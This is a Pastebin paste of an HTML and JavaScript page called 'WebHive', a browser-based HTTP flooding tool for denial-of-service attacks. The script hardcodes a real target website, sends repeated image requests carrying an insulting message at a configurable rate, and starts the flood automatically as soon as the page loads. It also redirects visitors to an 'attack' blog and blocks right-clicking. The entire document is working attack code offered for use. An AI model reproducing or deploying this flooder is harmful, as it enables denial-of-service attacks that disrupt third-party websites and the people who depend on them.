Advertisement
muymusicacom

Moyejo jumm XD

Nov 19th, 2012
278
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.91 KB | None | 0 0
  1. <meta http-equiv="refresh" content="60;url=http://haddozattack.blogspot.com/">
  2.  
  3. <script type="text/javascript">
  4.  
  5. //<![CDATA[
  6.  
  7. window.__CF=window.__CF||{};window.__CF.AJS={"abetterbrowser":{"config":"none"}};
  8.  
  9. //]]>
  10.  
  11. </script>
  12.  
  13. <style type="text/css">body{background-color:black;background-repeat:repeat;background-position:right;background-attachment:fixed;margin-top:5%;margin-bottom:5%;margin-left:15%;margin-right:15%;font-family:"Courier New",Courier,monospace;color:#808080;}fieldset{border-style:none;margin:10px;}p{margin:0;}input{margin:0;background-color:transparent;border:none;text-align:center;font-family:"Courier New",Courier,monospace;color:#808080;}</style>
  14.  
  15. <script type="text/javascript">
  16.  
  17. function setAttributeOnload(object, attribute, val) {
  18.  
  19. if(window.addEventListener) {
  20.  
  21. window.addEventListener("load",
  22.  
  23. function(){ object[attribute] = val; }, false);
  24.  
  25. } else {
  26.  
  27. window.attachEvent('onload', function(){ object[attribute] = val; });
  28.  
  29. }
  30.  
  31. }
  32.  
  33. </script>
  34.  
  35. <body onLoad="type()">
  36.  
  37. <div id="title" align="center"><font size="+3" color="#FF0000">[ </font><span class="Estilo4"><font size="+3">WebHive</font> </span><font size="+3" color="#FF0000">]</font>
  38.  
  39. <br>
  40.  
  41. <div id="hive" align="center">
  42.  
  43. <font color="#FF0000">[</font>TARGET<font color="#FF0000">]</font><br>
  44.  
  45. <input name="target" id="targetURL" type="text" style="width: 100%;" value="http://rinconmixto.com/"><br><br>
  46.  
  47. <font color="#FF0000">[</font>PETICIONES<font color="#FF0000">]</font><br>
  48.  
  49. <input id="rps" style="width: 100%;" value="20"><br><br>
  50.  
  51. <fieldset>
  52.  
  53. <font color="#FF0000">[</font>MENSAJE<font color="#FF0000">]</font><br>
  54.  
  55. <input id="message" style="width: 100%;" value="Deja de atacar putito"><br><br>
  56.  
  57. </fieldset>
  58.  
  59. <font color="#FF0000">[</font>STATUS<font color="#FF0000">]</font><br>
  60.  
  61. PETICIONES <p id="requestedCtr">0</p>
  62.  
  63. EXITOSAS <p id="succeededCtr">0</p>
  64.  
  65. FALLIDAS <p id="failedCtr">0</p><br>
  66.  
  67. <button id="fireButton" style="background-color:#000000; border-color: rgb(255, 255, 255); color: rgb(255, 255, 255);">Detener</button><br><br><br>
  68.  
  69. </div>
  70.  
  71. <p align="center">
  72.  
  73. <script>
  74.  
  75. (function () {
  76.  
  77. var fireInterval;
  78.  
  79. var isFiring = false;
  80.  
  81. var currentTime = new Date()
  82.  
  83. var lastSuccess = currentTime.getTime();
  84.  
  85. var requestedCtrNode = document.getElementById("requestedCtr"),
  86.  
  87. succeededCtrNode = document.getElementById("succeededCtr"),
  88.  
  89. failedCtrNode = document.getElementById("failedCtr"),
  90.  
  91. targetURLNode = document.getElementById("targetURL"),
  92.  
  93. fireButton = document.getElementById("fireButton"),
  94.  
  95. messageNode = document.getElementById("message"),
  96.  
  97. rpsNode = document.getElementById("rps"),
  98.  
  99. timeoutNode = document.getElementById("timeout");
  100.  
  101. var targetURL = targetURLNode.value;
  102.  
  103. targetURLNode.onchange = function () {
  104.  
  105. targetURL = this.value;
  106.  
  107. };
  108.  
  109. var requestsHT = {}; //
  110.  
  111. var requestedCtr = 0,
  112.  
  113. succeededCtr = 0,
  114.  
  115. failedCtr = 0;
  116.  
  117. var makeHttpRequest = function () {
  118.  
  119.  
  120.  
  121. if ( requestedCtr > 2000) { // Permite No Enviar mas de 1000 peticiones
  122.  
  123. clearInterval(fireInterval);
  124.  
  125. isFiring = false;
  126.  
  127.  
  128.  
  129. return;
  130.  
  131. } else { lastSuccess = currentTime.getTime();};
  132.  
  133.  
  134.  
  135. var rID =Number(new Date());
  136.  
  137. var img = new Image();
  138.  
  139. img.onerror = function () { onFail(rID); };
  140.  
  141. img.onabort = function () { onFail(rID); };
  142.  
  143. img.onload = function () { onSuccess(rID); }; //
  144.  
  145.  
  146.  
  147. img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
  148.  
  149. requestsHT[rID] = img;
  150.  
  151. onRequest(rID);
  152.  
  153. };
  154.  
  155. var onRequest = function (rID) {
  156.  
  157. requestedCtr++;
  158.  
  159. requestedCtrNode.innerHTML = requestedCtr;
  160.  
  161. };
  162.  
  163. var onComplete = function (rID) {
  164.  
  165. delete requestsHT[rID];
  166.  
  167. };
  168.  
  169. var onFail = function (rID) {
  170.  
  171. // failedCtr++;
  172.  
  173. //failedCtrNode.innerHTML = failedCtr;
  174.  
  175.  
  176.  
  177. succeededCtr++; //
  178.  
  179. succeededCtrNode.innerHTML = succeededCtr;
  180.  
  181. delete requestsHT[rID]; //
  182.  
  183. };
  184.  
  185. var onSuccess = function (rID) {
  186.  
  187. succeededCtr++;
  188.  
  189. succeededCtrNode.innerHTML = succeededCtr;
  190.  
  191. delete requestsHT[rID];
  192.  
  193. };
  194.  
  195. fireButton.onclick = function () {
  196.  
  197. if (isFiring) {
  198.  
  199. clearInterval(fireInterval);
  200.  
  201. isFiring = false;
  202.  
  203. this.innerHTML = "Atacar!";
  204.  
  205. } else {
  206.  
  207. isFiring = true;
  208.  
  209. this.innerHTML = "Detener!";
  210.  
  211. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));
  212.  
  213. }
  214.  
  215. };
  216.  
  217. function FireIbero() {
  218.  
  219. if (isFiring) {
  220.  
  221. clearInterval(fireInterval);
  222.  
  223. isFiring = false;
  224.  
  225. this.innerHTML = "Atacar!";
  226.  
  227. } else {
  228.  
  229. isFiring = true;
  230.  
  231. this.innerHTML = "Stop flooding";
  232.  
  233. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));
  234.  
  235. }
  236.  
  237. };
  238.  
  239. //Cambiar Target y descomentar la funcion FireIbero();
  240.  
  241. document.getElementById("targetURL").value = "http://rinconmixto.com/";
  242.  
  243. FireIbero();
  244.  
  245. })();
  246.  
  247. </script>
  248.  
  249. </p>
  250.  
  251. <div id="footer" align="center">
  252.  
  253. <p><font color="#FF0000"># [</font>Lo siento :3<font color="#FF0000">]</p>
  254.  
  255. </div>
  256.  
  257. <script language=JavaScript>
  258.  
  259. <!--
  260.  
  261. var message="Funcion Desactivada";
  262.  
  263. ///////////////////////////////////
  264.  
  265. function clickIE4(){
  266.  
  267. if (event.button==2){
  268.  
  269. alert(message);
  270.  
  271. return false;
  272.  
  273. }
  274.  
  275. }
  276.  
  277. function clickNS4(e){
  278.  
  279. if (document.layers||document.getElementById&&!document.all){
  280.  
  281. if (e.which==2||e.which==3){
  282.  
  283. alert(message);
  284.  
  285. return false;
  286.  
  287. }
  288.  
  289. }
  290.  
  291. }
  292.  
  293. if (document.layers){
  294.  
  295. document.captureEvents(Event.MOUSEDOWN);
  296.  
  297. document.onmousedown=clickNS4;
  298.  
  299. }
  300.  
  301. else if (document.all&&!document.getElementById){
  302.  
  303. document.onmousedown=clickIE4;
  304.  
  305. }
  306.  
  307. document.oncontextmenu=new Function("alert(message);return false" )
  308.  
  309. // -->
  310.  
  311. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement